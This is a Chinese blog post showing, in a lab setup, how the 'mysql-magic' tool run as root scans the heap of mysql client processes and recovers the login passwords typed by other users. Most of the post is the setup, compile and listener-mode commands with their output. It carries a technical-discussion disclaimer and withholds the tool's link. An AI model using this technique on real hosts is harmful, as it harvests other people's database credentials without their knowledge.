使用Mysql-magic获取Mysql账户密码
版权声明:本文为博主原创文章,欢迎转载,转载请注明原文超链接https://www.cnblogs.com/zerotrust/p/10846530.html
本文仅限于技术讨论与分享,严禁用于非法用途。
在有root权限的情况下获得Mysql数据库密码的情况有很多,我们来使用其中一种,
- mysql-magic
The mysql client read the password, then write this for some malloc'ed memory, and free it, but just because a chunk was freed doesn't mean it will be used again, to ensure that your programs not keep sensitive information in memory you must overwrite the memory.
The main goal is get the password passed through tty, but sometimes it also gets the password passed from command line (-pxxxxxx).
首先搭建测试环境,我这里用的是centos7
[root@baoleiji ~]# uname -a
Linux baoleiji 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
[root@baoleiji ~]#
- 安装mariadb
[root@baoleiji ~]# yum -y install mariadb-server
[root@baoleiji ~]# yum -y install gcc- 启动数据库,添加用户密码
作为依赖被升级:
mariadb-libs.x86_64 1:5.5.60-1.el7_5
完毕!
[root@baoleiji ~]# systemctl start mariadb
[root@baoleiji ~]# mysqladmin -u root password niub666
[root@baoleiji ~]# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>- 渗透环境搭建好了,上传工具到被攻击机
[banxia@banxia-pc 下载]$ scp -r ./mysql-magic root@192.168.2.3:~- 进入mysql-magic目录编译
[root@baoleiji mysql-magic]# cd ~
[root@baoleiji ~]# cd
.cache/ .config/ Diamorphine/ mysql-magic/
[root@baoleiji ~]# cd
.cache/ .config/ Diamorphine/ mysql-magic/
[root@baoleiji ~]# cd mysql-magic/
[root@baoleiji mysql-magic]# make
- 在内存中搜索密码并获取偏移量
[root@baoleiji mysql-magic]# ./
ignotum/ mysql-magic src/
[root@baoleiji mysql-magic]# ./mysql-magic -s
[19:40:48] executing mysql (/usr/bin/mysql) ...
[19:40:48] pid = 2764
[19:40:48] waiting syscall exit_group
[19:40:48] exit detected !!!
[19:40:48] getting heap info
[19:40:48] reading the heap ...
[19:40:48] password found
[19:40:48] offset list: 0x850- 启动监听模式
[root@baoleiji mysql-magic]# ./mysql-magic -o 0x850 -d /tmp -l
[19:42:53] waiting for connections
然后只要有人登录数据库就能拿到密码
[root@baoleiji mysql-magic]# ./mysql-magic -o 0x850 -d /tmp -l
[19:59:26] waiting for connections
[19:59:26] new connection found
[19:59:26] looking for mysql processes
[19:59:26] getting heap address of pid 3066
[19:59:26] heap = 7f69a70d5000-7f69a7118000
[19:59:26] 274432 bytes read of 274432
[19:59:26] heap saved to /tmp/3066-7f69a70d5000-7f69a7118000.dump
[19:59:26] string at offset 0x850:
[19:59:26] finishps:如上软件可能因为编码会显示不出来账号密码,如果没显示出来的话可以在/tmp目录下查看
[root@baoleiji strings /tmp/3000-7f09f89cd000-7f09f8a10000.dump
<charset5.5.60-MariaDB
<copyrig!
root
niub666
出于安全的目的就不放软件链接了,学习需要的可以单独留下邮箱,我发过去。
更多精彩
